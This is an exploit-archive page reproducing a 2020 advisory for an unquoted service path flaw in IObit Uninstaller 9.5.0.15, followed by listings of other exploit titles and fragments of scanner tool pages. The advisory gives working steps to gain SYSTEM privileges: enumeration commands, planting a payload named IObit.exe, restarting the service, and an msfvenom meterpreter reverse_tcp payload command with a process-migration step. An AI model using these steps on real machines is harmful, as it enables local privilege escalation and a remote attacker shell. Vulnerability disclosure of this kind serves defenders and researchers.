Menu

Search for hundreds of thousands of exploits

"IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path"

Author

Exploit author

Gobinathan

Platform

Exploit platform

windows

Release date

Exploit published date

2020-06-04

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
# Title: IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path
# Author: Gobinathan L
# Date: 2020-06-03
# Vendor Homepage: https://www.iobit.com
# Software Link: https://www.iobit.com/en/advanceduninstaller.php
# Version : 9.5.0.15
# Tested on: Windows 10 64bit(EN)

About Unquoted Service Path :
==============================

When a service is created whose executable path contains spaces and isn't enclosed within quotes, 
leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges. 
(only if the vulnerable service is running with SYSTEM privilege level which most of the time it is).

Steps to recreate :
=============================

1.  Open CMD and Check for USP vulnerability by typing 	[ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ]
2.  The Vulnerable Service would Show up.
3.  Check the Service Permissions by typing 				[ sc qc IObitUnSvr ]
4.  The command would return.. 

	C:\>sc qc IObitUnSvr
	[SC] QueryServiceConfig SUCCESS
	SERVICE_NAME: IObitUnSvr
			TYPE               : 10  WIN32_OWN_PROCESS
			START_TYPE         : 2   AUTO_START
			ERROR_CONTROL      : 0   IGNORE
			BINARY_PATH_NAME   : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
			LOAD_ORDER_GROUP   :
			TAG                : 0
			DISPLAY_NAME       : IObit Uninstaller Service
			DEPENDENCIES       :
			SERVICE_START_NAME : LocalSystem

5.  This concludes that the service is running as SYSTEM. "Highest privilege in a machine"
6.  Now create a Payload with msfvenom or other tools and name it to IObit.exe
7.  Make sure you have write Permissions to "C:\Program Files (x86)\IObit" directory.
8.  Provided that you have right permissions, Drop the IObit.exe executable you created into the "C:\Program Files (x86)\IObit" Directory.
9.  Now restart the IObit Uninstaller service by giving coommand [ sc stop IObitUnSvr ] followed by [ sc start IObitUnSvr ]
10. If your payload is created with msfvenom, quickly migrate to a different process. [Any process since you have the SYSTEM Privilege].

During my testing :

Payload : msfvenom -p windows/meterpreter/reverse_tcp -f exe -o IObit.exe
Migrate : meterpreter> run post/windows/manage/migrate [To migrate into a different Process	]

# Disclaimer :
=========================
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2020-06-04 "IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path" local windows Gobinathan
2020-05-22 "VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP_ASLR)" local windows Gobinathan 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected